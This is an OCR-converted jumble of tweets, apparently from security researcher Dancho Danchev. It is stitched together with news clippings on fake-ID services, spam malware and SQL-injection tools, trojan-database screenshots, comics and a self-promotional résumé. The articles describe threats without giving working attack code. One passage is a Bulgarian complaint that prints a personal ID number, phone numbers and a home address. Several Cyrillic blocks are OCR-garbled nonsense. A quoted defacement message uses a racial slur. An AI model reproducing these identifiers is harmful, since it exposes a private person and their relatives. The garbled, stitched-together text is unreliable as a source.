[Screenshot of a trojan database viewer. Legible capability labels: WORM: E-MAIL PROPAGATION, WORM: IRC PROPAGATION, KEYSTROKE LOGGER, FTP SERVER, PASSWORD GRABBER, DESTRUCTIVE, TARGETS SPECIFIC PROGRAMS, STARTS EVERYTIME WINDOWS STARTS. Legible entries include Back Orifice 0.6.3136 alpha and DeepThroat 1.0.]


Database Viewer Copyright © 1999, Diamond Computer Systems Pty.Ltd. - information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg)


16 - Monday 


10:17 


This just in. Shipping them in batches. Since the early days of humankind. I just got a
FortiMail and quite impressive a FortiSandbox appliance where I wanted to thank my
current employer @whoisxmlapi for making the infrastructure investment. Stay
tuned! https://t.co/uflP2wCxli
20 - Friday
04:57 
This is me and @whoisxmlapi rocking the boat! - https://t.co/VUSMB6njx5 


*1 


21 - Saturday 


01:54 


https://t.co/VuUSMB6njx5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #cybersecuritytips #cybercriminals #ThreatIntelligence 
#threatreport https://t.co/pn9Otfsx1Z 
WhoisXMLAPI


Apply for Access to the Law Enforcement Nautilus Feed


The Law Enforcement Nautilus Feed is a private subscription and collaborative service
that offers in-depth technical analysis and attribution of curated lists of Indicators of
Compromise (IOCs) and Articles of Interest (AOIs) linked to major malicious
campaigns and APT groups.


The service is available exclusively to law enforcement, government agencies,
licensed private investigators, and security organizations. Please start the enrollment
process by applying for access.


24 - Tuesday 


10:15 


https://t.co/JTcqOaYgET | https://t.co/OmUajr8DT8 | https://t.co/sMWCGUWRé6g | 
https://t.co/ZOwW9r2oiV | https://t.co/eufoOwGUnb | https://t.co/nNsXMPrGi0 | 
https://t.co/7GM10oNelFK | https://t.co/uvAt5gK9BA | https://t.co/UZ6qVAhXVF 
https://t.co/cxwtzGpImF 


10:22 


RT @whoisxmlapi: For law enforcement, intel from WXA can provide critical clues 
about threat actors or even prevent cybercrime. Discover ho... 


10:38 
https://t.co/JTcqOaYOur https://t.co/IwBxUr2gY] 
10:38


https://t.co/JTcqOaYgET https://t.co/IIH9yXm3vV 


10:39 


https://t.co/JTcqOaYgET https://t.co/7hHUB300gFk 
10:39


https://t.co/JTcqOaYgET https://t.co/4hFiOETMO5 
10:40


https://t.co/JTcqOaYgET https://t.co/Oo4EZyb7eO 
https://t.co/JTcqOaYOur https://t.co/ZceCrdPiTi


10:48


https://t.co/JIcqOaYgET https://t.co/uSjeb23ngD 
10:48


https://t.co/JTcqOaYgET https://t.co/3ixzp4s4dB 
10:49


https://t.co/JTcqOaYgET https://t.co/g4fiCptF2u 
10:49


https://t.co/JTcqOaYgET https://t.co/OGE40Xpyx0 
https://t.co/JTcqOaYgET https://t.co/W3BuAF4nYq


10:50


https://t.co/JTcqOaYgET https://t.co/eRYkb14kEl 
https://t.co/JTcqOaYOur https://t.co/iT7cjXgQU9
https://t.co/JTcqOaYgET https://t.co/3VTATBJOA5
https://t.co/JTcqOaYgET https://t.co/uks2SNzq5v
https://t.co/JTcqOaYgET https://t.co/CO5Cd1TDLH


10:52


https://t.co/JIcqOaYgET https://t.co/m7reNNjhop 
10:52


https://t.co/JTcqOaYgET https://t.co/Ubiu5iCmhp 


10:53 


https://t.co/JTcqOaYgET https://t.co/BfLCyqy7Jz 
https://t.co/JTcqOaYgET https://t.co/orA96vou76
https://t.co/JTcqOaYgET https://t.co/qxjSX35KoS
https://t.co/JTcqOaYgET https://t.co/g47D28qkEP
https://t.co/JTcqOaYgET https://t.co/EzPI3IsvpA
https://t.co/JTcqOaYgET https://t.co/AYewqPzqbG


10:55 


https://t.co/JTcqOaYgET https://t.co/rzMd3GVUXn 
26 - Thursday


09:36 


When we used to rock the boat! - https://t.co/eVsxfo6tWx Cheers! Dancho CC: 
@Webroot https://t.co/gUuLsClkKu 
09:37


When we used to rock the boat! - Part Two - https://t.co/eVsxfo6tWx Cheers! Dancho 
CC: @Webroot https://t.co/XurF79jgNw 




09:38 
https://t.co/JTcqOaYgET https://t.co/y8ThCY40BQ 
https://t.co/JTcqOaYgET https://t.co/nck7gyqPI3
https://t.co/JTcqOaYgET https://t.co/sa5OQpE2DY


Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
Views
100K


Cyber


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 


The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


09:50 
https://t.co/JTIcqOaYgET https://t.co/5vCgjnDOHW 




09:50 


https://t.co/JTcqOaYgET https://t.co/bxoRCvhhij 




09:51 


https://t.co/JIcqOaYgET https://t.co/hjUOlsOeEB 


EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV 
Cybercrime service automates creation of
fake scanned IDs, other verification docs


The service produces high-quality fake scans that can be used in fraud attacks to impersonate
victims, Group-IB researchers said


By Lucian Constantin
Romania Correspondent, CSO


A new Web-based service for cybercriminals automates the creation of fake
scanned documents that can help fraudsters bypass the identity verification
processes used by some banks, e-commerce businesses and other online
services providers, according to researchers from Russian cybercrime
investigations firm Group-IB.


The service can generate scanned copies of passports, ID cards and driver's
licenses from different countries for identities supplied by the service users, fake
scanned utility bills from various companies, as well as fake scanned copies of
banking statements and credit cards issued by a large number of banks, said
Andrey Komarov, head of international projects at Group-IB, via email.


It is common practice for banks, payment and money transfer providers, online
gambling sites and other types of businesses that engage in money transactions
via the Internet to ask their customers for scanned copies of documents in order
to prove their identities or verify their physical addresses, especially when their
anti-fraud departments detect suspicious account activity.
by Adam Greenberg, Senior Reporter


November 05, 2013


Mass website hacking tool alerts to dangers of Google
dorks


Google dorks are not geeks who love the internet-related services and products provider. Google dorks are akin to
super-specific searches, which attackers have been known to take advantage of in attempts to expose vulnerable
websites.


Cyber crime researcher Dancho Danchev recently blogged about a mass, do-it-yourself (DIY) website hacking tool
making the rounds that takes advantage of those Google dorks.


“The proxy supporting tool has been purposely designed to allow automatic mass websites reconnaissance for the
purpose of launching SQL injection attacks against those websites that are vulnerable,” Danchev wrote.


SQL stands for structured query language and is programming terminology designed for managing data. SQL
injection typically involves an attacker inputting SQL statements into an entry field that will force the system to
execute potentially malicious commands.


“Once a compromise takes place, the attacker is in a perfect position to inject malicious scripts on the affected
sites, potentially exposing their users to malicious client-side exploits serving attacks,” according to Danchev.


Danchev wrote that an escalating number of DIY tools circulating the internet may open the door for novice
attackers, but Barry Shteiman, director of security strategy with Imperva, told SCMagazine.com on Tuesday that it is
the Google dorks that should be raising alarms.
Fake CNN Alert Still Spreading Malware


By Gregg Keizer


The massive attack that has infected PCs by tricking users into clicking links
in fake messages from CNN.com shows little sign of ending soon, security
researchers say.


According to MX Logic Inc., spam posing as CNN.com Top 10 lists peaked at
close to 11 million messages per hour early Thursday, but remained at high
volumes throughout the day Friday. The Colorado security vendor said it had
been tracking an average of 8 million messages per hour since midnight.


MX Logic's vice president of information security, Sam Masiello, called the
trend “a very slow, but steady decline” from the 11 a.m. Mountain Time peak
the day before.


Masiello also said that the spam has changed since attacks were first
launched on Tuesday. “We've also seen several morphings of this spam over the
past couple of days,” he said in an entry posted on the MX Logic blog Friday.
Where the messages once trumpeted “CNN.com Daily Top 10” in the
subject heading and linked to a single filename on malware-hosting sites, now
the spam sports a subject reading “CNN Alerts: My Custom Alert” and uses a
variety of filenames in the malicious URL.


“This is likely in response to all of the media attention and awareness that has
been brought up over the past couple of days,” Masiello speculated.


Also on Friday, Websense Inc. reported that its researchers had seen the
attack mutating, with the spam subject heading not only touting “CNN Alerts:
My Custom Alert” but also using legitimate news stories culled from CNN to
make the messages more convincing.


Users who clicked on the “FULL STORY” link in the message were redirected
to a fake CNN site, where they were told they needed to download an update
to Flash Player, Adobe Systems Inc.'s popular Internet media player, to view a
video clip from CNN.


Websense also said it had spotted traces of the campaign in blog spam.


If users agreed to download the bogus Flash update, they were trapped in an
endless loop, where clicking “Cancel” in the initial dialog produced a second
pop-up. Clicking “Cancel” there returned the user to the first pop-up. The only
options at that point were for users to shut down the browser or give in and
install the malware.


MX Logic added that it had seen the URLs in the spam lead to legitimate
domains that had probably been compromised, and named a UK-based
hosting company as an example.


Earlier this week, Bulgarian security researcher Dancho Danchev had found
Cybercrime service automates creation of
fake scanned IDs, other verification docs


The service produces high-quality fake scans that can be used in fraud attacks to impersonate
victims, Group-IB researchers said


By Lucian Constantin


A new Web-based service for cybercriminals automates the creation of fake
scanned documents that can help fraudsters bypass the identity verification
processes used by some banks, e-commerce businesses and other online
services providers, according to researchers from Russian cybercrime
investigations firm Group-IB.


The service can generate scanned copies of passports, ID cards and driver's
licenses from different countries for identities supplied by the service users, fake
scanned utility bills from various companies, as well as fake scanned copies of
banking statements and credit cards issued by a large number of banks, said
Andrey Komarov, head of international projects at Group-IB, via email.


It is common practice for banks, payment and money transfer providers, online
gambling sites and other types of businesses that engage in money transactions
via the Internet to ask their customers for scanned copies of documents in order
to prove their identities or verify their physical addresses, especially when their
anti-fraud departments detect suspicious account activity.


Using image manipulation software to change the photo
on a scanned ID is obviously not a new practice, but services like the one
identified by Group-IB that automate the whole process and produce high quality
results are new on the cybercriminal market, Komarov said.


According to Group-IB, the service is provided through a website hosted on a
server in Germany. The domain name was registered in May, but the service
was launched in mid-August, Komarov said.


Independent cybercrime researcher Dancho Danchev described a very similar
service in a July blog post; however, Komarov could not confirm whether it is the
same one because there was no reference to the service's domain name in
Danchev's report.


The service found by Group-IB has templates for passports, ID cards and
driver's licenses for the U.S., Canada, Russia, the U.K., Germany, the
Netherlands and other European Union countries. It also has templates for bank
statements, credit cards (front and back side) and utility bills from banks and utility
companies operating in those countries.


The templates are for documents and cards that show signs of use and are
scanned at different angles and different positions on the canvas. This makes
the resulting image appear more authentic.
[Screenshot of a New York Times article, “Web Gang Operating in the Open”, on the Koobface gang]
Virtual Space


CYBERTERRORISM
HOW REAL IS THE PROBLEM?


THE INFORMATION ECONOMY, which the world entered over the last 20 years,
favors the development of modern means of communication, breaking down
intercontinental and ethnic boundaries and giving new dimensions to the
concept of the information society, or perhaps the more accurate concept
is an information-dependent society!

This article seeks to examine the problem of information warfare and the
cyberterrorism that invariably accompanies it from different points of view.
It will answer the following questions - what is cyberterrorism and what is
the difference between it and information warfare? Can the actions of
information warfare and cyberterrorism cause human casualties or economic
chaos, and what are the possible scenarios?
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Parra omGapsnemo na 


Gepnauus lamo US u foges: gakmap 


Gpewemo wa Cmygenama Goons LPY o 
KIS ca papermaw ocmpGmo xs HUMINT 
(woBewko pagyzsafane), umpopsauu- 
ommama peodbuus u soGaupeuus 
gonputece 32 gomwurumeaHome pay 
Gemnue na SIGING (camaro papyna 
Gane} ELINT (pap pu) u gope 
CYBERINT (hasGeppayygnstione). Becke 
om ufipoenume munofe @ noxfiae ya 
opanzules, & 32 jausemes wrus. 

1B Hetudgany go npegu 2 efey 
Maknocms ja Co Gera ne © aman ppane 
ma pajyyubameas unfopemms « 
Gegene na Goemwe grécméus, Mup- 
Gam auepelandu payyyabameren 
camexem - CORONA, uznpauas 
evipanume camewmes crouke = 
CvGemchus cvlog wpe3 kancywa, koumo 
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cOmanina Presents 


I'm back niggaz better than ever t0 Own j00 


More Hackz Of Troyan Pages Coming These Days Because The Passwords Are Let's Say:hacker,troyan,Enkin etc. etc. 


I'm Fucking With These Pages Only Because Of Nark@manina’s Wish And As I Said Because Of The Weak Passwords. 


10:00 
https://t.co/JTcqOaYgET https://t.co/o88gvuVW9IL 
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10:00 
https://t.co/JTcqOaYgET https://t.co/tt9pYtMCZt 


10:00 
https://t.co/JTcqOaYgET https://t.co/Jt8ELjW8vv 
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10:00 
https://t.co/JTIcqOaYgET https://t.co/aolxjvmLjO 


It's All a Matter of Perspective 


Somewhere in Eastern Europe In a “hacker recruitment" basement 


What?! 
Can you believe Someone's 
this Yuri? disrespecting 
$450,000 per Lenin's idea for 
year and nota equal distribution 
single donation in of income? 


John Doe's entire |) "proceed" with his 


Outrageous, but 
knowing it’s teens 
without girlfriends 

behind this, | know my 
money are safe 


If only he It has come to our 
knew that attention that you're 

half the Quite talanted for a 
world's intel cybercriminal Andrei. 
agencies Congrats, as of today 
outsource to || you serve “the family" 
and will code malware 


ifactad 
over 10,000 
sitas in Italy, 
Yes honey, our, cease 


lifetime? bank accounts aaa, your 


Faye a to stay alive. 
money are safe. 


Yes, my 
Master! 


10:01 
https://t.co/JTcqOaYgET https://t.co/y8S2ePDYGm 


www stripgenerator.com 
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2010/07/22 12:50 


10:01 
https://t.co/JTcqOaYgET https://t.co/ghRSiqHGe4 
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EXPOSING KOOBFACE: THE 
WORLD'S LARGEST BOTNET 
DANCHO DANCHEV 


10:01 


https://t.co/JTcqOaYgET https://t.co/QVsnQclInl6 
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100 AYYWAX PASBOAHBIX MYJIOB . 
B USA VK UK EX EMECHYHO 


10:01 
https://t.co/JTcqOaYgET https://t.co/1JOMOFted2 
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10:02 



https://t.co/JTcqOaYgET https://t.co/nQrmYPkveU 
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PRIMARY CHARACTERISTICS 


SIZE: 124928 

kK FTP J REMOTE ACCESS TROJAN 

tifice 1.20 Wor: E-MAIL PROPAGATION 

Wor: IRC PROPAGATION 
KEYSTROKE LOGGER 
FTP SERVER 
PASSWORD GRABBER 
DESTRUCTIVE 
TARGETS SPECIFIC PROGRAMS 
STARTS EVERYTIME WINDOWS STARTS 


Rect RY AND ras ACTIVI ’ 
[HKEY_LOCAL_MACHINE\SOFTWARE “\Microse indows\Current¥ersic 


Database Viewer Copyright © 1999, Diamond Computer Systems Pty. Ltd. - information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


10:02 
https://t.co/JTcqOaYgET https://t.co/5B9dh4pBiv 


10:02 


https://t.co/JTcqOaYgET https://t.co/gfMAWkliaY 
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10:02 


https://t.co/JIcqOaYgET https://t.co/oGxsCuiM3i 


10:11 


https://t.co/JTcqOaYgET https://t.co/mZbvWXvOFx 
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10:11 


https://t.co/JTIcqOaYgET https://t.co/XSSUVO10QA 


10:12 


https://t.co/JTcqOaYgET https://t.co/CYYLjjVNM4 


Astalavista Security Group — 
Astalavista 2.0 — Investment Proposal 


By Dancho Danchev — 


oe 


dancho.danchev@hush.co 


10:12 
https://t.co/JTcqOaYgET https://t.co/nVW61nkXHf 
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What is Astalavista Security 


100.00% Organic 


10:13 



and delivered to thousands of h 


* A ubiquitous and a diverse set of premium fes
leading to the World's largest and most vibre 
Hacking and Cyber Security Grid Network 
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10:13 


10:13 


https://t.co/JTcqOaYgET https://t.co/yljkirFPRA 


Who's behind it? 


https://t.co/JTcqOaYgET https://t.co/rh9wovYNX2 


Who's behind it? 


ConSpiracy 
Who Owns 


Astalavista Security 2.0 - A Hacker in Every Home
The World's Largest and Most Vibrant Security and Hacking Community
ers Your Momet Stay Sunect 


10:13 


Contributor to Black Sun Research Facility
(BSRF)


Trojan Defense 


Contributor to LockDownCorp 


10:13 
https://t.co/JTcqOaYgET https://t.co/ztEsxLkQyA 
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Related Product and Service 
Images and Screenshots 


10:13 
https://t.co/JTcqOaYgET https://t.co/xgCkCxx7OL 


Related Product and Service 
Images and Screenshots 


Astalavista Security Group Security Training - 
Basics of OPSEC 
Explore the Basics of OPSEC


— 


10:15 


https://t.co/JTcqOaYgET https://t.co/Nwp4jPHeWE 


10:16 


It's called 
with DoO's cyber assets is ' from the Russian || | “segmenting 
unacceptable. Initiate an to faciliate OSINT A the attack 
immediate traceback! through botnets. population" 

"Ensure your Yuri. 
transmit back the || victory before ; : Perhaps we 
data obtained | | starting a battle’, should print 
from the infected , out new 
brochures. . 


www. stripgenerotor.com 
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30 - Monday 


09:19 


RT @whoisxmlapi: WhoisXML API tracks prominent cybercriminal groups. To help 
#cybersecurity industry we have now uncovered a list of active... 


June 


3 - Friday 
06:29 
@Jeff__yates Jeff. Got it. I'll drop you a line shortly. Regards. Dancho 


*2 
07:10 


@Jeff__yates Just replied. 


*1 


4 - Saturday 


08:29 
RT @whoisxmlapi: Who’s going to RSAC 2022 next week? 
WhoisXML API team is going to be present at RSAC 2022 and we are looking forward 


to... 
6 - Monday 
00:41 
https://t.co/cfoHy1tkeG 
00:41 


https://t.co/2fnuOEmM1hT 


8 - Wednesday 


01:40 


I’m back full time! Check this out - https://t.co/WIBGTU5ryT RSS - 
https://t.co/2VRBr24Ya9 and show your support! Regards. Dancho #CyberSecurity 
#cyberattacks #cybercrime #cybersecuritytips #CyberSec #CybersecurityAdvisory 
#security #Threatintelligence https://t.co/qGPgqaPKq4 
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Offensive Warfare 2.0 - The Web's Primary 
Cybercrime Research OSINT And Threat 
Intelligence Central Clearing House 
Recent Posts


Profiling a Currently Active Portfolio of Rogue and Fake News Domains

Exposing the Internet-Connected Infrastructure of the Infamous "Innovative Marketing" Rogue Scareware Provider - An OSINT Analysis


06:35 
https://t.co/I8IN78UTpe https://t.co/js5ES7OEkKVd 

06:35 
https://t.co/eA8DCIZgNQ https://t.co/f4cOTmuvCd 

06:36 
https://t.co/tfoGvc4oyK https://t.co/H42kdZFOKg 

06:36 
https://t.co/Q7QgXQ3xn7 https://t.co/7_LtFGARNYp 

06:36 
https://t.co/YAvxahXPUO https://t.co/ompO08vKyQK 

06:36 
https://t.co/qhX7shFRLQ https://t.co/jX4TgPgpgd 

06:36 
https://t.co/NfcNpDvRq7 


06:36 
https://t.co/yUfNCGB4VA 


06:36 
https://t.co/wdt5sD4Rxv 


06:36 
https://t.co/iPcYVtW5Wk 


06:53 
@paulfroberts @ReversingLabs Paul. Check this out - https://t.co/EfZynMvQAy this is 
me and my information using OSINT on SolarWinds. Cheers to everyone at #RSAC22 
#RSAC who knows me and remembers my research. CC: @netresec 


06:57 


@ImposeCost Is this for real? I thought that #RSAC22 #RSAC is a mainstream type of
event rather than a COMSEC event to bring in the OPSEC crowd which would be
surreal. My point - I’d never bring in my "personal details" in the form of anything but
a just bought hotel PC.


07:00 


Who’s attending #RSAC22 #RSAC and remembers my research (2008-2013)? -
https://t.co/UZ6qVANxVF Mad props although I don’t truly understand the meaning
of this greeting to everyone who knows me. "Congratulate a friend and say hi to
Dancho". #KeepTheSpirit


07:14 
https://t.co/xLNts45F1t 
07:14 
https://t.co/HAL7R6UIixX 
07:14 
https://t.co/t~XAnNWpPoF 
07:14 
https://t.co/DXbq6EZNwC 
07:14 
https://t.co/oO0VsryUYm 
07:14 
https://t.co/RPO1fPkqZT 
07:14 
https://t.co/Fx27SUPRmu 
07:14 
https://t.co/ZbwyG56DI) 
07:14 
https://t.co/N1JTGA973i 
07:15 
https://t.co/dKDjAueVOm 
07:15 


https://t.co/7 Fyh5EJnhx 
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07:15 
https://t.co/LRFHMOPkhk 


07:15 
https://t.co/KDq44uboM8 

07:15 
https://t.co/5EgOZytl1t 

07:15 
https://t.co/bOjUV4sNjp 

10:43 

Dear @Cryptome_org - I just sent you an email. Regards. Dancho
10:44 


Dear @Cryptome_org - second tweet in a row. I’m trying to figure out whether I could
feature this on the front page? - https://t.co/mfznqmBl4Q [PDF] as I believe it would
be extremely informative and relevant for your readers. Regards. Dancho


*1 
10:46 


https://t.co/mfznqmBl4Q [PDF] #security #cybercrime #malware #CyberSecurity 
#Threatintel #threathunting https://t.co/G230V6zvPm 
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10:46 


= Chapter 1 


Cyber 
Intelligence 


The Definite Cybercrime and Web 2.0 Memoir
Courtesy of Dancho Danchev
The RBN, The Koobface Botnet, The Rock Phish Gang,
Spam Phishing and Malware Campaigns including Botnet and
Money Mule Recruitment Scams Traced Down to Their
Source Including Various Underground Market Propositions
Exposed


https://ddanchev.blogspot.com


Dancho Danchev 




https://t.co/JTcqOaYgET https://t.co/DjNVvxhO3D 
[Chart: Dancho Danchev's Blog - Mind Streams of Information Security Knowledge. Views over time, Jan 2011 to Jan 2019; vertical axis 25K to 150K; figure shown: 9.36M]


10:48 


https://t.co/mfznqmBl4Q [PDF] #security #cybercrime #malware #Threatintel 
#threathunting https://t.co/vGjoUHz4nD 
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Cyber 
Intelligence 


10:49 


Who wants access to this? - https://t.co/JTcqOaYgET - drop me a line at 
dancho.danchev@hush.com https://t.co/U8cY820DZe 


21 ¥*1 
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11:14 


Check this out! - https://t.co/JTcqOaYgET #security #cybercrime #malware 
https://t.co/pDviX2gLXr 
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Lit 


Kazvam se Dancho Danchev svetoven specialist v sferata na borbata s 
kiber prestupnosta dete sum s EGN: 8311226968 I mobilen telefon 
+35987689389@ ot Troyan I mobilen telefon na moqta maika - +359886124919 
I dnes reshih da podam signal otnosno sebe si I nezakonen nasilstven moi 
arest ot slujiteli na RPU Troyan v godinata 2@1@ s kradeni moi documenti 
koito prosto trqbvalo da predstavq I sus shteti v razmer na 85,0@@ leva 
or tormoz I lipsa na pravorazdavane I eventualen opit za otvlichane or 
mogta kushta v godinata 201@ ot sushtite slujiteli bez svideteli I bez 
pravorazdavane or strana na durjavata s cel da buda poseten ili privikan 
i da buda razpitan ot vashi slujiteli spored ugovorka Ili na mqsto na 
moi postognen adres koito e Dimiter Ikonomov 34 Street, Troyan, Bulgaria 
i dnes reshih da podam signal otnosno nezakonen arest otnasqsht se do 
men i posledvashta krajba i eventualno upoqvane na moi adres bez moe 
znanie s cel da buda poseten ili da buda privikan za izqsnqvane na 
obstogtelstva. 


V godinata 201@ nepoznato psihiatrichno bolno lice nahluva v kushtata v 
koqto jiveq i mi vadi documenti s drugo lice koeto go chaka na stulbite 
v kushti s ideqta da se vidim. Na sledvashtiq den policeiski sluhiteli 
ot RPU Troyan nahluvat v staqta v koqto jiveq i me izdurpvat nasila bez 
svideteli i mi pokazvat kopie na lichnata mi karta koeto ne sum 
predostavql i me vodqt s kola v neizqsnena posoka bez da e davane 
obqsnenie za zadurjaneto mi. Po putq pishat gorivoto na kolata s koqto 
sme na firma Lesoplast kogeto e firmata na maika mi i bashta mi kudeto 
te sa bili slujiteli predi godini sled koeto me otvqjdat v neizqsnena 
posoka v sgrada v grad Lovech i me vodqt pri chovek koito ne poznavam i 
stoim i ne mi se dava obqsnenie za zadurjaneto mi sled koeto ne karat da 
si pokaja lichnata karta pred moite roditeli i da se podpisha i me 
zakluchvat v karcer v sgradata za period ot nqkolko meseca kato mi 
zakluchvat documentite i telefona i mi vzimat wryzkite na obuvkite i 
kolana bez da mi e davano obqsnenie za zadurjaneto mi. 


Prikachvam jalba koqto sum zapochnal da pisha v godinata 2016 i koqto 
nikoga ne sum vnasql poradi facta che neznam kakva e prichinata za 
sluchvashtoto se s men. Poslednoto mi poseshtenie v RPU Troyan e za da 
saobshtq che bashta mi me e otrovil i mi kazvat da ne jiveq poveche u 
nas. Na sledvashtiq den me poseshtava slujitel ot RPU Troyan za da me 
pita kude hodia a samiq chovek koito e ot RPU Troyan e sushtiq koito me 
e arestuval nezakonno i me e izdurpal ot u nas s otkradnati documenti 
nasila i bez svidelite v godinat-a 2@1@ kato dnes sme 2021. 


https://t.co/JIcqOaYgET #security #cybercrime #malware https://t.co/GT7mJBYQwE 


Hi Dancho. 


Are you alive? :) 
I just got this email. 


Best regards, 

Dmitry Bestuzhev 

Senior Regional Researcher, Latin America 
Global Research and Analysis Team 
Kaspersky Lab 

Key ID: 4096/0xE4D1B9CE 
http://www.kaspersky.com 
http://www.securelist.com 
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11:15 
https://t.co/JTcqOaYgET #security #cybercrime #malware https://t.co/qv7kwSUwCM 


Hi Dancho, 
I have been following the concern about your whereabouts and wanted to see if you were reachable.
best,
John Markoff


https://t.co/mfznqmBl4Q [PDF] #security #cybercrime #malware 
https://t.co/CZBYizaC6B 


LOVELY HORSE @ 
@iovelyhorse A 


11:18 


Who wants access to this? - https://t.co/JTcqOaYgET drop me a line at 
dancho.danchev@hush.com https://t.co/DHyAGKmT6z 
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Enjoy the world’s most extensive and in-depth SNA (Social Network Analysis) of Iran’s 
hacker scene using @MaltegoHQ courtesy of me - https://t.co/zg7gV6K5Q1 [RAR] 
including a busted FBI’s Most Wanted Cybercriminal using OSINT. 
https://t.co/ZClsAeKmTI 


' 


11:21 


Remember BakaSoftware? Remember the glorious days of scareware also known as 
rogue security software when we used to truly rock the boat in terms of taking them 
offline and reporting their activities? Keep it coming! - https://t.co/JTcqOaYgET 


https://t.co/dOkF3wAB31 
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11:23 


Remember my work on the Koobface botnet? Check out my Keynote presentation at 
@CyberCamp 2016 - https://t.co/Ivjfw9emTb [MPEG4] - https://t.co/JTcqOaYgET 
https://t.co/KM1njncp42 


HNNCast052110 




11:25 


Did you know that I have my own vinyl courtesy of a Canadian industrial artist? Grab
a copy today - https://t.co/zhtnSGqaqaPa - https://t.co/JIcqOaYgET 
https://t.co/osYvoYSS9Z 


Sted Loe 
SUCK MY DICK 


11:25 
https://t.co/UZ6qVANxVF #security #cybercrime #malware https://t.co/fGTLLVO1Ij 
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Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understanding 
of Security Hacking and
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 


11:26 
https://t.co/UZ6qVANXxVF #security #cybercrime #malware https://t.co/v49pgDU99N 
Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


23:20 
https://t.co/ZOonYBBIEC - #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
23:21 
https://t.co/aSL3S1hRJW #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
23:21 
https://t.co/GPKHONF1Wo #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
23:21 
https://t.co/sOqge8dv07Z #security #cybercrime #malware #CyberSecurity 
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#cyberattacks #Threatintelligence #Threatintel 


9 - Thursday 


05:41 
https://t.co/eU0771qTjm #security #cybercrime #malware 


2 
05:42 

https://t.co/9NpdxoYbUU #security #cybercrime #malware 
05:42 

https://t.co/P7qMH2tEaO #security #cybercrime #malware 
05:47 


Looks like I just made it to the front page at - https://t.co/FnnUHQE1YP thanks a lot 
@Cryptome_org for featuring my "Cyber Intelligence" memoir - 
https://t.co/6V8OFTdlSv [PDF] happy reading and stay tuned for the second edition! 
Regards. Dancho https://t.co/I7xUQfcpoS 


*1 


2022-022.pdf Cyber Intelligence - Danchev Memoir, June 8, 2022


21:13 


Folks. Check this out! - "Apply for Access to the Law Enforcement Nautilus Feed" - 
https://t.co/VuSMB6njx5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #threathunting #threatintel CC: @whoisxmlapi 
https://t.co/YMs920ZQO1 


2 *1 
Law Enforcement Nautilus Feed


Apply for Access to the Law Enforcement Nautilus Feed


The Law Enforcement Nautilus Feed is a private subscription and collaborative service
that offers in-depth technical analysis and attribution of curated lists of Indicators of
Compromise (IOCs) and Articles of Interest (AOIs) linked to major malicious
campaigns and APT groups.


The service is available exclusively to law enforcement, government agencies,
licensed private investigators, and security organizations. Please start the enrollment
process by applying for access.


11 - Saturday 


01:02 


https://t.co/VuSMB6njx5 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #cyberthreats #CyberSec #cybersecuritytips 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/SJ6WJQOYNO 


09:34 


https://t.co/Vv4nwa4tzj #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cybersecuritytips #CyberSec #cyberwar #CyberWarrior 
#ThreatHunting #Threatintelligence #threatintel https://t.co/OU3jIBptEU 
12:46
In retrospective - "I Know Who DDoS-ed Georgia Last Summer". Takes you back
doesn’t it? This is my modest experience with the now marketing leading social
network analysis and multiple OSINT sources aggregation software tool Maltego. CC:
@MaltegoHQ https://t.co/LLW4k7yvmZ


*1


Dancho Danchev is an expert in the field of cybercrime
fighting and threat intelligence gathering having actively
pioneered his own methodology for processing threat
intelligence leading to a successful set of hundreds of
high-quality analysis and research articles published at the
industry's leading threat intelligence blog - ZDNet's Zero Day,
Dancho Danchev's Mind Streams of Information Security
Knowledge and Webroot's ThreatBlog with his research
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine,
The Register, NYTimes, CNET, ComputerWorld, H+Magazine
currently producing threat intelligence at the industry's
leading threat intelligence blog - Dancho Danchev's - Mind
Streams of Information Security Knowledge which has
received over 5.6M page views since December, 2005 and is
currently considered one of the security industry's most
popular security publications.


Key achievements include:

- Presented at the GCHQ with the Honeynet Project
- SCMagazine Who to Follow on Twitter for 2011
- Participated in a Top Secret GCHQ Program called "Lovely Horse"
- Identified a major victim of the SolarWinds Attack - PaloAltoNetworks
- Found malware on the Web Site of Flashpoint
- Tracked monitored and profiled the Koobface Botnet and exposed one botnet operator
- Made it to Slashdot two times
- My Personal Blog got 5.6M Page Views Since December, 2005
- My old Twitter Account got 11,000 followers
- I had an average of 7,000 RSS readers on my blog
- I have my own vinyl "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" made by a Canadian artist
- Currently running Astalavista.box.sk
- I gave an interview to DW on the Koobface Botnet
- I gave an interview to NYTimes on the Koobface botnet
- I gave an interview to Russian OSINT
- Listed as a major competitor by Jeffrey Carr's Taia Global
- Presented at the GCHQ
- Presented at Interpol
- Presented at InfoSec
- Presented at CyberCamp
- Presented at RSA Europe
Re-shipping mules all the way baby! - https://t.co/uDr5P54stp #security #cybercrime
#malware #CyberAttack #ThreatHunting #Threatintelligence #Threatintel
Track Your Order


Calculate Time and Cost
Select a Country
Select a Region
Calculate


Contact us for more information


630.889.1100
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Re-shipping mules all the way baby! - Part Two - https://t.co/uDr5P54stp Images 


https://t.co/B9nDbUBrnE 


We ship your packages with care
on time, everytime.


Overseas Shipping Specialist


